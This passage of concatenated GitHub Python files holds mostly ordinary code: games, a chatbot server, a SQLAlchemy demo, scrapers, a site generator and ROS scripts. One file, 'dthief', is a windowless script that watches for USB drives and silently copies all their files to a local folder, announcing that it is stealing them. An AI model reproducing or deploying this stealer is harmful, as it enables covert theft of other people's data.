ratio])\r\n with open(f'{args.dir}/dump/{args.exp_name}/explored_area.txt', 'r') as f:\r\n content = '[' + ''.join(f.readlines()).replace('\\n', '').replace('][', '],[').replace(' ', ',') + ']'\r\n area = eval(content)\r\n area = np.array([x[-1] for x in area])\r\n with open(f'{args.dir}/dump/{args.exp_name}/close_episode_len.txt', 'r') as f:\r\n 
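# one close-episode length per line in the dump; parsed into a float array below\r\n            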
length = np.array([float(x.rstrip()) for x in f.readlines()])\r\n with open(args.scenes, 'r') as f:\r\n scenes = [x.rstrip() for x in f.readlines()]\r\n args.parallel = len(scenes)\r\n assert len(scenes) % args.parallel == 0\r\n scene_per_process = len(scenes) // args.parallel\r\n scenes = [scenes[i*scene_per_process:(i+1)*scene_per_process] for i in range(args.parallel)]\r\n ratio = ratio.reshape(args.parallel, -1)\r\n area = area.reshape(args.parallel, -1) / (ratio + 1e-3)\r\n length = length.reshape(args.parallel, -1)\r\n ratio_dict = {}\r\n area_dict = {}\r\n length_dict = {}\r\n valid_dict = {}\r\n for i in range(args.parallel):\r\n for j in range(ratio.shape[1]):\r\n scene_name = scenes[i][j % scene_per_process]\r\n if ratio_dict.get(scene_name) is None:\r\n ratio_dict[scene_name] = []\r\n area_dict[scene_name] = []\r\n length_dict[scene_name] = []\r\n valid_dict[scene_name] = []\r\n ratio_dict[scene_name].append(ratio[i, j])\r\n area_dict[scene_name].append(area[i, j])\r\n length_dict[scene_name].append(length[i, j])\r\n valid_dict[scene_name].append(ratio[i, j] > 0.7 and length[i, j] <= 2500)\r\n for d in [ratio_dict, area_dict, length_dict, valid_dict]:\r\n for k, v in d.items():\r\n d[k] = np.array(v)\r\n\r\n for i, j in ratio_dict.items():\r\n k = length_dict[i]\r\n a = area_dict[i]\r\n valid = np.logical_and(j > 0.7, k <= 2500)\r\n if not valid.any():\r\n valid[:] = True\r\n result.append('\\t'.join([\r\n i + ' ' * (20 - len(i)),\r\n '{:.0f}'.format(a.mean()),\r\n '{}\\t{}'.format(int(k[valid].mean()), int(k[valid].std())),\r\n '{:.1f}\\t{:.1f}'.format(100 * j[valid].mean(), 100 * j[valid].std()),\r\n '{:.0f}'.format(valid_dict[i].mean() * 100)\r\n ]))\r\n unable_to_achieve_full_coverage += (j <= 0.9).sum()\r\n unable_to_explore_in_time += (k == 2999).sum()\r\n total_eps += np.prod(j.shape)\r\n if 0.9 <= valid_dict[i].mean() < 1:\r\n result[-1] += f'\\t{np.argmin(valid_dict[i] * 1)}'\r\n for lst, r in zip(mean_len, split):\r\n if r[0] <= a.mean() < r[1]:\r\n for v in k:\r\n lst.append(v)\r\n\r\n print('\\n'.join(result))\r\n print('unable_to_achieve_full_coverage: {:.1f}%'.format(100 * unable_to_achieve_full_coverage / total_eps))\r\n print('unable_to_explore_in_time: {:.1f}%'.format(100 * unable_to_explore_in_time / total_eps))\r\n for lst, r in zip(mean_len, split):\r\n if lst == []:\r\n continue\r\n print('mean length [{}~{}m2]: {:.1f}'.format(r[0], r[1], sum(lst) / len(lst)))\r\n \r\n\r\nif __name__ == '__main__':\r\n main()\r\n","repo_name":"siyandong/NeuralCoMapping","sub_path":"scripts/easy_analyze.py","file_name":"easy_analyze.py","file_ext":"py","file_size_in_byte":4393,"program_lang":"python","lang":"en","doc_type":"code","stars":61,"dataset":"github-code","pt":"75"} +{"seq_id":"26429114750","text":"import socket\nimport threading\nimport argparse\nimport json\nimport datetime\nimport netifaces ### imported module netifaces - 09/11/17\nimport requests ### imported module requests - 09/11/17\nfrom aes import AESEncryption\nfrom weather import weather\nfrom currency import currency\n\nclass server(object): ### Dominic Egginton\n ''' server is a class that handled network connections, pass host ip, host port and AES key for init'''\n def __init__(self, hostIP, hostPort, key): ### Dominic Egginton\n self.hostIP = hostIP\n self.hostPort = hostPort\n self.key = key\n self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n self.socket.bind((self.hostIP, self.hostPort))\n print('** server started 
on\\n** internal - {}:{}\\n** external - {}:{}\\n'.format(self.getServerIP()['internal'], self.hostPort,self.getServerIP()['external'] ,self.hostPort))\n\n def serverListen(self): ### Dominic Egginton\n ''' serverListen listens to incoming connects from clients and opens a new thread for each connected client '''\n self.socket.listen(15)\n while True:\n try:\n client, clientAddress = self.socket.accept()\n client.settimeout(300)\n threading.Thread(target=self.receiveFromClient,args = (client, clientAddress)).start() # Open new thread for each client. calling receiveFromClient and pass the client socket and client address\n print('** Client Connected {} - {}'.format(clientAddress, self.getIpData(clientAddress)['city']))\n except:\n raise Exception('Client connection error')\n\n def getIpData(self, clientAddress): ### Dominic Egginton\n ''' getIpData returns ip data from http://ip-api.com/ in json format. pass client address as string '''\n request = requests.get('http://ip-api.com/json/{}'.format(clientAddress))\n requestJson = request.json()\n if requestJson['status'] == 'success':\n return requestJson\n else:\n return self.getIpData('') # recursive call in case client ip is in private range, therefore needs to get server ip data\n\n def receiveFromClient(self, client, clientAddress): ### Dominic Egginton\n ''' receiveFromClient handles incoming data from clients and sends formatted responses back to client '''\n byteSize = 4096 # large bytesize as we need to send and receive large data between client and server\n while True:\n try:\n receivedData = client.recv(byteSize)\n if receivedData and type(receivedData) == bytes:\n aesObject = AESEncryption(self.key)\n receivedStr = aesObject.decrypt(receivedData).replace('!',\"\").replace('?',\"\")\n client.sendall(aesObject.encrypt(self.formResponse(receivedStr, clientAddress, client)))\n else:\n print('** Client Disconnected {}'.format(clientAddress))\n client.close()\n return False\n except Exception as e:\n print(\"{} - Disconnecting {}\\n\".format(e, clientAddress))\n client.close()\n return False\n\n def formResponse(self, receivedStr, clientAddress, client): ### Charlie Barry and Dominic Egginton\n keysFound, extraData = self.searchJSON(receivedStr)\n # IF ONLY PYTHON HAD SWITCH STATEMENTS <- :) :)\n if 'curse' in keysFound: ### Tom has done the curse code\n return \"Please watch your language.\"\n\n elif 'currency' in keysFound:\n if extraData.get('currency'):\n currencyInfo = extraData.get('currency')\n currencyData = currency()\n answer = currencyData.convert(currencyInfo['cFrom'],currencyInfo['cTo'],currencyInfo['amount'])\n if answer != \"\":\n return \"{} {} in {} is {}\".format(currencyInfo['amount'],currencyInfo['cFrom'].upper(),currencyInfo['cTo'].upper(), answer)\n return \"Sorry, I can't convert that.\"\n\n elif 'weather' in keysFound:\n clientIpData = self.getIpData(clientAddress)\n weatherData = weather()\n return weatherData.weatherResponse(keysFound, clientIpData, extraData)\n\n elif 'cinema' in keysFound: ### Charlie Barry and Mitko Donchev\n ### I apologise for the laziness of this code, need to patch it up sometime :( - Charlie\n from cinema import searchCinema, showTime, fetchCinema #imports all the functions from cinema.py\n clientIpData = self.getIpData(clientAddress)\n location = {'latitude': clientIpData['lat'], 'longitude': clientIpData['lon']}#gets the location of the client from their ip address\n aesObject = AESEncryption(self.key)\n client.sendall(aesObject.encrypt(fetchCinema(location) + \"Select a cinema for 
more information (type 'back' to go back)\"))#sends message to client\n            while True:\n                cinemaData = client.recv(4096)#receives message sent from client\n                cinemaStr = aesObject.decrypt(cinemaData).replace('!',\"\").replace('?',\"\")#decrypts message into plaintext\n                if cinemaStr.lower() != 'back':\n                    IDC = searchCinema(location)\n                    extracinemainfo = showTime(IDC,cinemaStr)\n                    client.sendall(aesObject.encrypt(extracinemainfo))#gets extra info for cinema and sends it to client\n                    if not(extracinemainfo == 'Wrong cinema! Please try again by chosing the right number!'):#if user inputted a legitimate answer\n                        cinemaData = client.recv(4096)#receive any string\n                        break#returns to main server code\n                elif cinemaStr.lower() == 'back':#if user says 'back' then returns to main server code\n                    break\n            return \"Exited Cinema Mode Successfully\"#returns to main server code\n\n\n        elif 'ipinfo' in keysFound:\n            ipData = self.getIpData(clientAddress)\n            return \"Your IP is {}, provided by {}.\".format(ipData['query'], ipData['isp'])\n\n        elif 'celery' in keysFound:\n            return \"/w/https://youtu.be/MHWBEK8w_YY\"\n\n        else:\n            return \"Sorry, I don't understand what you are talking about.\"\n\n    def getServerIP(self): ### Charlie Barry and Dominic Egginton\n        ''' returns the server's internal and external IP addresses as a dictionary '''\n        deviceName = netifaces.gateways()['default'][netifaces.AF_INET][1]\n        return {'internal': netifaces.ifaddresses(deviceName)[netifaces.AF_INET][0]['addr'],'external': self.getIpData('')['query']}\n\n    def searchJSON(self, receivedStr): ### Charlie Barry\n        '''searches receivedStr for keywords which appear in keywords.json. returns a list of keysFound and a dictionary of additional data'''\n        jsonData = json.load(open('keywords.json', encoding='utf-8'))\n        receivedList = receivedStr.split(\" \")\n        keysFound = []\n        extraData = {}\n        for key in jsonData: #for each key in jsonData\n            for keyword in jsonData[key]: #get each keyword from the key\n                for word in receivedList: #for each word in receivedList\n                    if word.lower() == keyword: #if said word is a keyword\n\n                        if key == 'location' and 'location' not in keysFound: #if the key is 'location', and a location has not yet been found\n                            try: #try\n                                extraData['location'] = receivedList[receivedList.index(word) + 1] #to add the following word to extraData\n                                keysFound.append(key) #and add the key to keysFound\n                            except: #otherwise\n                                continue #continue\n\n                        elif key == 'currency' and 'currency' not in keysFound: #if the key is 'currency', and a currency has not yet been found\n                            keysFound.append(key) #add the key to keysFound\n                            currencyData = currency() #create an instance of the class 'currency'\n                            extraData['currency'] = currencyData.inputStr(receivedStr) #then return the currency conversion and add this to extraData\n\n                        elif key == 'time' and 'time' not in keysFound: #if the key is 'time', and a time has not yet been found\n                            keysFound.append(key) #add the key to keysFound\n                            extraData['time'] = jsonData[key][keyword] #adds time to extraData\n\n                        else:\n                            if key not in keysFound: #if the key has not yet been found\n                                keysFound.append(key) #add key to keysFound\n                        continue\n\n        return keysFound, extraData\n\n\ndef getArgs(): ### Dominic Egginton\n    ''' getArgs returns all program arguments '''\n    parser = argparse.ArgumentParser(description='Server')\n    parser.add_argument('-p', '--port', metavar='Port', default=1143, type=int, help='Server port')\n    parser.add_argument('-k', '--key', metavar='Key', default='gbaei395y27ny9', type=str, help='Encryption Key')\n    return 
parser.parse_args()\n\ndef main(): ### Dominic Egginton\n    ''' main - init server '''\n    args = getArgs()\n    if args.port == 1143:\n        print('** no server port specified using default - 1143')\n    server('', args.port, args.key).serverListen() # I have passed an empty string for the host IP as it will be filled in later\n\nif __name__ == '__main__':\n    main()\n","repo_name":"dominicegginton/chatBot","sub_path":"server/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":10309,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"}
{"seq_id":"17589150671","text":"from utils.connection import connect_db\nfrom sqlalchemy.orm import Session\nfrom mymodels import User, Order # assuming you have already defined the User and Order models\n\n# create the database connection\nengine = connect_db()\n\n# create a Session object\nsession = Session(engine)\n\n# run the JOIN queries\n# query the records in the User and Order tables that match the condition, and load the results into User objects\n\n# SELECT users.*\n# FROM users\n# JOIN orders ON users.userid = orders.userid\n# WHERE orders.status = 'completed';\nusers = session.query(User).join(Order, User.userid == Order.userid).filter(Order.status == 'completed').all()\n\n# SELECT users.username\n# FROM users\n# JOIN orders ON users.userid = orders.userid\n# WHERE orders.status = 'completed';\nusers = session.query(User.username).join(Order, User.userid == Order.userid).filter(Order.status == 'completed').all()\n\n\n\n# use the query results\nfor user in users:\n    print(f\"User ID: {user.userid}, Username: {user.username}, Email: {user.email}\")\n\n# close the Session\nsession.close()\n","repo_name":"AdlerHu/SQLAlchemy","sub_path":"join.py","file_name":"join.py","file_ext":"py","file_size_in_byte":1012,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"}
{"seq_id":"5796787858","text":"from flask import json\nimport random\n\n\ndef setplayer(pname,powerup):\n    player = {\n        \"name\" : pname,\n        \"powerup\" : powerup,\n        \"life\" : 3,\n        \"win\" : 0\n    }\n    return player\n\n\ndef save(info):\n    import midtest\n    with open('static/saveinfo.txt', 'w', encoding = 'utf-8') as s:\n        json.dump(info, s, ensure_ascii = False, indent='\\t')\n\n\ndef load():\n    with open('static/saveinfo.txt', 'r', encoding='utf-8') as load:\n        data = load.read()\n        player = json.loads(data)\n    return player\n\ndef update(result):\n    update = load()\n    if result == 'drawwin' or result == 'win':\n        update[\"win\"] += 1\n    elif result == 'lose':\n        update[\"life\"] -= 1\n    with open('static/saveinfo.txt', 'w', encoding = 'utf-8') as s:\n        json.dump(update, s, ensure_ascii = False, indent='\\t')\n\n\ndef changenum():\n    player_info = load()\n    if player_info[\"powerup\"] == '가위': # scissors\n        return 1\n    elif player_info[\"powerup\"] == '바위': # rock\n        return 2\n    else : # paper\n        return 3\n\n\ndef play(num):\n    other_num = random.randint(1,3)\n    powerup = random.random()\n    if num == other_num:\n        if changenum() == num and powerup >= 0.5: \n            update('drawwin')\n            return 
'drawwin'\n        else:\n            return 'draw'\n    elif (num+1)%3 == other_num%3:\n        update('lose')\n        return 'lose'\n    else :\n        update('win')\n        return 'win'\n","repo_name":"kvr3010/kit2020_2_1_MID","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":1435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"}
{"seq_id":"41110091115","text":"#!/usr/bin/env python3\n\nspreadsheet = []\n\nwith open(\"./input.txt\") as f:\n    data = f.read().split(\"\\n\")[:-1]\n\nfor line in data:\n    spreadsheet.append([int(num) for num in line.split(\"\\t\")])\n\nchecksum = 0\n\nfor line in spreadsheet:\n    small = min(line)\n    big = max(line)\n    checksum += (big - small)\n\nprint(checksum)\n","repo_name":"tannerstephens/advent-of-code","sub_path":"2017/02/solve1.py","file_name":"solve1.py","file_ext":"py","file_size_in_byte":321,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"}
{"seq_id":"24371784001","text":"\n\nimport subprocess, os, filecmp, shutil\r\nfrom datetime import datetime\r\nfrom time import sleep\r\n\r\nwhile True:\r\n\r\n    # path & variables \r\n\r\n    tmp_file = r\"C:\\Temp\\log.txt\"\r\n\r\n    home_folder = r\"C:\\DTheft_USB\"\r\n    now = datetime.now()\r\n    dt_string = now.strftime(\"%a%d%y%H%M%S\")\r\n\r\n    newfolder = home_folder+chr(92)+dt_string+chr(92) \r\n    files = str(newfolder)\r\n    makelog = str(newfolder)+\"log.txt\"\r\n    makefolder = str(newfolder)\r\n    make_abs = os.path.abspath(makelog)\r\n\r\n\r\n    output = subprocess.check_output(\"wmic logicaldisk get caption, drivetype\", shell=True)\r\n    data = str(output)\r\n    x = data.find(\"2\")\r\n    if not x == -1 :\r\n\r\n        get = data.find(\"2\")\r\n        cvt = int(get)\r\n        divise = cvt - 9\r\n        getD = data[divise:cvt]\r\n        global lecteur\r\n        lecteur = getD[0:2]\r\n        print(\"Your stolen drive is: \", lecteur)\r\n        path_dir = \"dir /W \"+lecteur+\">\"+tmp_file\r\n        full_path_dir = str(path_dir)\r\n        cmd = \"cmd /C\" +full_path_dir\r\n\r\n\r\n        os.system(cmd) # Create the log file at c:\temp\\log.txt\n    \r\n\r\n\r\n\r\n        if not os.path.exists(home_folder):\r\n            os.system(\"cls\")\r\n            print(\"Folder name is: \",dt_string)\r\n            add_folder = \"md \"+newfolder\r\n            os.system(add_folder)\r\n\r\n            shutil.copyfile(tmp_file, make_abs)\r\n            dthief_files = \"xcopy \"+lecteur+\"\\*.* /Q /E /Y \"+files+\"*.*\"\r\n            os.system(dthief_files)\r\n            \r\n\r\n        elif os.path.exists(home_folder):\r\n            list_comp = []\r\n            for dirpath, dirnames, filenames in os.walk(home_folder):\r\n                for filenames in [f for f in filenames if f.endswith(\"log.txt\")]:\r\n                    log = os.path.join(dirpath, filenames)\r\n                    comp = filecmp.cmp(log, tmp_file) \r\n                    list_comp.append(comp)\r\n            \r\n\r\n            \r\n            print(list_comp)\r\n            if True in list_comp :\r\n                os.system(\"cls\")\r\n                print(\"file found : \")\r\n                print(\" \")\r\n                for content in os.listdir(lecteur):\r\n                    print(content)\r\n                sleep(1.0)\r\n                \r\n\r\n            else :\r\n                os.system(\"cls\")\r\n                print(\"Folder name is: \",dt_string)\r\n                print(\" \")\r\n                add_folder = \"md \"+newfolder\r\n                os.system(add_folder)\r\n\r\n                shutil.copyfile(tmp_file, make_abs)\r\n                print(\"Stealing files successfully ...\")\r\n                print(\" \")\r\n                dthief_files = \"xcopy \"+lecteur+\"\\*.* /Q /E /Y \"+files+\"*.*\"\r\n                os.system(dthief_files)\r\n                for content in os.listdir(lecteur):\r\n                    print(content)\r\n                sleep(2.0)\r\n                \r\n        \r\n    else :\r\n        print(\"USB not found\")\r\n        sleep(1.5)\r\n\r\n\r\n\r\n\r\n\r\n    \r\n","repo_name":"anrsaad/DTheft-V1.0","sub_path":"dthief(code for developer).pyw","file_name":"dthief(code for developer).pyw","file_ext":"pyw","file_size_in_byte":2862,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"}
{"seq_id":"36587410096","text":"# Maximum value\r\n\r\n# From the first 
line to the ninth line, one natural number is given per line. The given natural numbers are smaller than 100.\r\n# Print the maximum value on the first line, and on the second line print the position of the maximum value.\r\n\r\na = []\r\nfor i in range(9): # read nine natural numbers\r\n    n = int(input())\r\n    a.append(n) # append() -> adds n to the end of the list\r\n\r\nprint(max(a)) # print the maximum value\r\nprint(a.index(max(a)) + 1) # print the position of the maximum among the inputs (index() -> returns the offset of the value)\r\n# lists start at index 0, so add 1 before printing. e.g. a[7] -> 8th\r\n","repo_name":"Choi-yk/baekjoon_lv","sub_path":"2562.py","file_name":"2562.py","file_ext":"py","file_size_in_byte":711,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"}
{"seq_id":"27895347749","text":"import requests\nimport json\nimport csv\n\n\n\nblitz_leaderboard_response = requests.get(\"https://ch.tetr.io/api/streams/blitz_global\")\nbase = blitz_leaderboard_response.json()\n\nthing = []\n\nfor i in range(100):\n\n    placement = i+1\n    username = base[\"data\"][\"records\"][i][\"user\"][\"username\"]\n    score = base[\"data\"][\"records\"][i][\"endcontext\"][\"score\"]\n\n    method = \"idk\"\n\n    clears = base[\"data\"][\"records\"][i][\"endcontext\"][\"clears\"]\n    pc_count = clears[\"allclear\"]\n    if (pc_count > 10):\n        # PC loop, DPC loop, BT loop\n        tsd_to_pc = clears[\"tspindoubles\"] / pc_count\n        tst_to_pc = clears[\"tspintriples\"] / pc_count\n\n        if (tsd_to_pc < .1):\n            method = \"PC Loop?\"\n        else:\n            if (tsd_to_pc < .5):\n                method = \"DPC Loop?\"\n            else:\n                if (tst_to_pc > .5):\n                    method = \"BT Loop?\"\n                else:\n                    if (base[\"data\"][\"records\"][i][\"endcontext\"][\"topbtb\"] > 30):\n                        method = \"LST/ST/freestyle?\"\n\n    thing.append([placement, username, score, method])\n    \nwith open('blitz_thing.csv', 'w', newline='') as file:\n    writer = csv.writer(file)\n    writer.writerows(thing)\n\n\n\n\n","repo_name":"swng/tetris-scripts","sub_path":"tetrio/guess_blitz_method.py","file_name":"guess_blitz_method.py","file_ext":"py","file_size_in_byte":1179,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"}
{"seq_id":"36829867869","text":"import fnmatch\n\nfrom hangman_helper import *\n\n\ndef update_word_pattern(word, pattern, letter):\n    \"\"\"\n    Takes as parameters the word, the current pattern, and a letter and returns an updated pattern containing the given\n    letter.\n    :param word: entire word\n    :param pattern: current pattern\n    :param letter: letter that was guessed\n    :return: updated pattern in string format\n    \"\"\"\n    pattern_list = list(pattern)\n    word_list = list(word)\n    new_pattern = \"\"\n    for i in range(len(word)):\n        if word_list[i] == letter:\n            pattern_list[i] = letter\n    return new_pattern.join(pattern_list)\n\n\ndef run_single_game(list_words, score):\n    \"\"\"\n    The function receives a list of words and a number of points with which the player starts the game and runs one game.\n    The function returns the number of points the player has at the end of the game.\n    :param list_words: list of words\n    :param score: current score\n    :return: updated score\n    \"\"\"\n    wrong_guess_lst = []\n    word = get_random_word(list_words)\n    message = \"Enter your guess\"\n    pattern = ''\n    guessed_letter_list = []\n    for i in word:\n        pattern = pattern + \"_\"\n    while \"_\" in pattern and score > 0:\n        display_state(pattern, wrong_guess_lst, score, message)\n        user_input = get_input()\n        letter = user_input[1]\n        if user_input[0] == LETTER:\n            if len(str(letter)) > 1:\n                message = \"Incorrect input\"\n                guessed_letter_list.append(letter)\n                continue\n            if not letter.isalpha():\n                message = \"Incorrect input\"\n                
guessed_letter_list.append(letter)\n continue\n if not letter.islower():\n message = \"Incorrect input\"\n guessed_letter_list.append(letter)\n continue\n if letter in guessed_letter_list:\n message = \"Letter already guessed, please guess another letter\"\n guessed_letter_list.append(letter)\n continue\n # if letter.isalpha() and letter.islower():\n score = score - 1\n if letter not in word:\n message = \"Incorrect Guess! Try Again\"\n wrong_guess_lst.append(letter)\n guessed_letter_list.append(letter)\n continue\n if letter in word:\n pattern = update_word_pattern(word, pattern, letter)\n n = word.count(letter)\n points = n * (n + 1) // 2\n score = score + points\n message = \"Guess the next letter\"\n guessed_letter_list.append(letter)\n continue\n if user_input[0] == WORD:\n score = score - 1\n if user_input[1] == word:\n n = pattern.count('_')\n points = n * (n + 1) // 2\n score = score + points\n pattern = word\n continue\n else:\n message = \"Incorrect word! Guess a word or letter again\"\n continue\n if user_input[0] == HINT:\n score = score - 1\n filtered_list = filter_words_list(list_words, pattern, wrong_guess_lst)\n n = len(filtered_list)\n suggestion_list = []\n if n > HINT_LENGTH:\n for i in range(HINT_LENGTH):\n suggestion_list.append(filtered_list[(i * n) // HINT_LENGTH])\n show_suggestions(suggestion_list)\n else:\n show_suggestions(filtered_list)\n if score <= 0:\n message = \"You Lose, the word is: \" + word\n elif \"_\" not in pattern:\n message = \"You Won\"\n display_state(pattern, wrong_guess_lst, score, message)\n return score\n\n\ndef filter_words_list(words, pattern, wrong_guess_list):\n \"\"\"\n The function returns a new list that contains only the words in the list of words that match the pattern and the\n previous guesses.\n :param words: List of words\n :param pattern: pattern of letters guessed\n :param wrong_guess_list: list of all wrong guesses\n :return: a formatted list\n \"\"\"\n final_list = []\n pattern = str(pattern).replace(\"_\", \"?\")\n filtered_words = fnmatch.filter(words, pattern)\n for i in range(len(filtered_words)):\n for j in wrong_guess_list:\n if j in filtered_words[i]:\n filtered_words[i] = 0\n # if k in filtered_words[i][]:\n for k in filtered_words:\n if k != 0:\n final_list.append(k)\n return final_list\n\n\ndef main():\n \"\"\"\n Main Function that triggers the game\n :return: None\n \"\"\"\n list_words = load_words(file='words.txt')\n initial = POINTS_INITIAL\n interested = True\n games_played = 0\n while interested:\n score = run_single_game(list_words, initial)\n games_played += 1\n if score > 0:\n interested = play_again(\"Total games played: \" + str(games_played) + \" And Current Score: \" + str(score) + \" Do you want to play another round?\")\n initial = score\n if score == 0:\n interested = play_again(\"Total games played: \" + str(games_played) + \" And Current Score: \" + str(score) + \" Do you want to play a new game again?\")\n initial = POINTS_INITIAL\n games_played = 0\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Rahulrxa/python-alfy-bootcamp","sub_path":"Week 2/Day 05/alfy_ex4/ex4_tests/hangman.py","file_name":"hangman.py","file_ext":"py","file_size_in_byte":5388,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"33056438168","text":"import sys\nfrom cx_Freeze import setup, Executable\n\nbase = None\n# To hide console on release versions, uncomment this :\nif sys.platform == \"win32\":\n base = \"Win32GUI\"\n\nsetup( name = \"ccs\",\n version = 
\"1.5\",\n description = \"CS:GO Custom Sounds\",\n options = {\"build_exe\": {\n \"packages\": [\"os\", \"wx\", \"pyglet\", \"google.protobuf\", \"steamfiles\"],\n \"excludes\": [\"tkinter\"],\n \"include_files\": [\"cache\", \"sounds\", \"gamestate_integration_ccs.cfg\", \"icon.ico\", \"config.ini\"],\n \"bin_includes\": [\"avbin64.dll\"],\n \"optimize\": 2,\n \"include_msvcr\": True,\n }},\n executables = [Executable(\"main.py\", base=base, targetName=\"csgo-custom-sounds.exe\")])\n","repo_name":"Meow-ops/csgo-quake-sounds","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":738,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"73612848242","text":"from __future__ import annotations\nimport os\nfrom typing import Optional\n\nimport resources\nimport shutil\nfrom . import with_parent\nfrom .resource import Resource\n\n\nclass Directory(Resource):\n def __init__(\n self,\n name: str,\n parent: Optional[Directory] = None,\n is_root: bool = False,\n has_files: bool = True,\n **kwargs,\n ):\n super().__init__(\n name=name,\n parent=parent,\n **kwargs,\n )\n self.children: list[Resource] = []\n self.is_root = is_root\n self.has_files = has_files\n\n def __enter__(self):\n with_parent.append(self)\n return self\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n with_parent.pop()\n\n def __iter__(self):\n yield self\n for child in self.children:\n yield from child\n\n def dir_parts(self) -> list[str]:\n return (\n (self.parent.dir_parts() if self.parent else [])\n + ([] if self.is_root else [self.name])\n )\n\n def file_parts(self) -> list[str]:\n return []\n\n @property\n def path(self) -> str:\n return './' if self.is_root else './' + self.dirname\n\n @property\n def url(self) -> str:\n dir_parts = self.dir_parts()\n return ('/' + '/'.join(dir_parts) + '/') if dir_parts else '/'\n\n @property\n def all(self) -> list:\n all = [self]\n for child in sorted(self.children):\n if hasattr(child, 'all'):\n all += child.all\n else:\n all.append(child)\n return all\n\n def find_all_links(self) -> list[(Resource, str)]:\n from .page import Page\n\n links = []\n for resource in self:\n if isinstance(resource, Page):\n page: Page = resource\n links += page.find_links()\n return links\n\n def find_files(self, source_dir: str):\n path = os.path.join(os.getcwd(), source_dir)\n path = os.path.join(path, self.dirname)\n path = os.path.normpath(path)\n if self.has_files:\n with os.scandir(path) as dir:\n for entry in dir:\n if entry.is_file():\n if self.should_include_file(entry.name):\n source = os.path.join(path, entry.name)\n source = os.path.normpath(source)\n source = os.path.relpath(source)\n if source.endswith(resources.page_file.PageFile.EXT):\n resources.page_file.PageFile(source, self)\n else:\n resources.file.File(source, self)\n for child in self.children:\n if hasattr(child, 'find_files'):\n child.find_files(source_dir)\n\n def find_index_page(self) -> Optional[resources.page.Page]:\n for child in self.children:\n if isinstance(child, resources.page.Page) and child.name == 'index':\n return child\n return None\n\n def should_include_file(self, name: str) -> bool:\n return not name.startswith('.')\n\n def build_documents(self):\n for child in self.children:\n child.build_documents()\n\n def generate(\n self,\n output_dir: str,\n is_dry_run=True,\n overwrite=False,\n ):\n path = os.path.join(output_dir, self.path)\n path = os.path.normpath(path)\n if os.path.exists(path) and overwrite:\n print(f'removing 
existing directory {path}')\n if not is_dry_run:\n shutil.rmtree(path)\n if not os.path.exists(path):\n print(f'creating directory {path}')\n if not is_dry_run:\n os.makedirs(path, exist_ok=overwrite)\n for child in self.children:\n child.generate(output_dir, is_dry_run, overwrite)\n","repo_name":"donmccaughey/donm_cc","sub_path":"gen/resources/directory.py","file_name":"directory.py","file_ext":"py","file_size_in_byte":3963,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"73757736241","text":"import rospy\nimport sys\nimport message_filters\nimport cv2\nimport signal\nimport std_msgs.msg\nfrom flightgoggles.msg import IRMarkerArray, IRMarker\nfrom sensor_msgs.msg import Image\nfrom cv_bridge import CvBridge, CvBridgeError\n\nclass Pixel:\n def __init__(self, x=-1, y=-1):\n \"\"\" Create two points that make up a pixel \"\"\"\n self.x = x\n self.y = y\n\nclass Gate:\n def __init__(self, a=Pixel(), b=Pixel(), c=Pixel(), d=Pixel()):\n \"\"\" Create four pixels that make up a gate \"\"\"\n self.a = a\n self.b = b\n self.c = c\n self.d = d\n\npubl = rospy.Publisher('colored_gates_left', Image, queue_size=100)\npubr = rospy.Publisher('colored_gates_right', Image, queue_size=100)\ngate_names = rospy.get_param(\"/uav/gate_names\", '[]')\n\ndef callback(ir_data, image_data_l, image_data_r):\n # process image data\n bridge = CvBridge()\n try:\n cv_image_l = bridge.imgmsg_to_cv2(image_data_l, \"bgr8\")\n cv_image_r = bridge.imgmsg_to_cv2(image_data_r, \"bgr8\")\n except CvBridgeError as e:\n print(e)\n\n relevant_gate_dict = {}\n\n for gates in gate_names:\n relevant_gate_dict[gates] = Gate()\n\n #print(\"gate_vals {}\".format(gates))\n for marker in ir_data.markers:\n if(marker.landmarkID.data in relevant_gate_dict):\n gate = relevant_gate_dict.get(marker.landmarkID.data)\n if(marker.markerID.data == \"1\"):\n gate.a = Pixel(marker.x, marker.y)\n elif(marker.markerID.data == \"2\"):\n gate.b = Pixel(marker.x, marker.y)\n elif(marker.markerID.data == \"3\"):\n gate.c = Pixel(marker.x, marker.y)\n elif(marker.markerID.data == \"4\"):\n gate.d = Pixel(marker.x, marker.y)\n relevant_gate_dict[marker.landmarkID.data] = gate\n # print(\"gate {}\".format(marker.landmarkID.data))\n # print(\"ID {}\".format(marker.markerID.data))\n # print(\"x {}, y {}\".format(marker.x, marker.y))\n # print(\"\\n\")\n for marker_ in relevant_gate_dict:\n gate_ = relevant_gate_dict[marker_]\n #print(\"rectangle t-l x {}, y {} : b-r x {}, y {}\".format(int(gate_.a.x), int(gate_.a.y),\\\n #int(gate_.d.x), int(gate_.d.y)))\n #cv2.rectangle(cv_image, (int(gate_.a.x), int(gate_.a.y)), (int(gate_.d.x), int(gate_.d.y)), (255,0,255), 2)\n if gate_.a.x != -1:\n cv2.circle(cv_image_l, (int(round(gate_.a.x)), int(round(gate_.a.y))), 5, (255,0,255), -1)\n if gate_.b.x != -1:\n cv2.circle(cv_image_l, (int(round(gate_.b.x)), int(round(gate_.b.y))), 5, (255,0,255), -1)\n if gate_.c.x != -1:\n cv2.circle(cv_image_l, (int(round(gate_.c.x)), int(round(gate_.c.y))), 5, (255,0,255), 